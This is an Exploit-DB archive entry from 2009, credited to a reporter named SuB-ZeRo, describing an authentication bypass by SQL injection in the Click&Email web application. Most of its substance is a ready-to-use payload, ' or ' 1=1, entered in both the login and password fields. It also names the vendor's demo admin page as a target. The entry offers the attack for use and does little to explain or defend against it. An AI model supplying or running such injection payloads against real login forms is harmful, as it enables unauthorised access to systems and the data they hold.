Click&Email; Auth Bypass SQL Injection Vulnerability

2009-01-18T00:00:00
ID EDB-ID:7817
Type exploitdb
Reporter SuB-ZeRo
Modified 2009-01-18T00:00:00

Description

Click&Email (Auth Bypass) SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            * Founded By : SuB-ZeRo (WaLiD)

* E-mail : Fbh@hotmail.com

* Home : WwW.dz-security.Net

* GreeTZ : Evils-dz & X.CJP.x & www.dz-security.net & gaza

---------------------------------------------------------

vondor : http://icash.ch

---------------------------------------------------------

Exploit Auth Bypass:



login: ' or ' 1=1

passw: ' or ' 1=1

----------------------------------------------------------

-[!]

Demo :

http://icash.ch/ClickAndEmailDemo/admin.asp

----------------------------------------------------------

# milw0rm.com [2009-01-18]